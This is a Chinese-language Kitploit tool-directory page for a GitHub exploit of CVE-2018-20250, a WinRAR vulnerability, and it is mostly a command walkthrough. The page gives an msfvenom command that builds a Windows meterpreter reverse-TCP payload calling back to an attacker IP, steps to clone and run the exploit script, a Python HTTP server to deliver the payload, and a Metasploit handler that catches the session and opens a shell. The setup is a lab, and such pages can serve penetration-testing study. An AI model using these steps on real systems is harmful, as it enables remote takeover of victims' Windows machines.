Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-20250 | Kitploit
工具/GitHubGitHub/lamsonbinh/cve-2018-20250
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHublamsonbinh/cve-2018-20250

CVE-2018-20250

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

设置

  • 视频演示:https://youtu.be/5tuWsi1tGS0
  • VirtualBox 虚拟机:https://j2c.cc/virtualbox-machine
  • Winrar 5.5 32bit:https://j2c.cc/winrar-550-32bit

操作步骤

  • Kali:
root@kitploit:~
ip a
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe > shell.exe
  • Windows:
root@kitploit:~
git clone https://github.com/LamSonBinh/CVE-2018-20250
py exp.py
  • Kali:
root@kitploit:~
python3 -m http.server
  • Windows: 10.0.0.199:8000
  • Kali:
root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set lport 1234
set lhost 10.0.0.199
exploit -j

sessions
sessions 1
sysinfo
shell
下载工具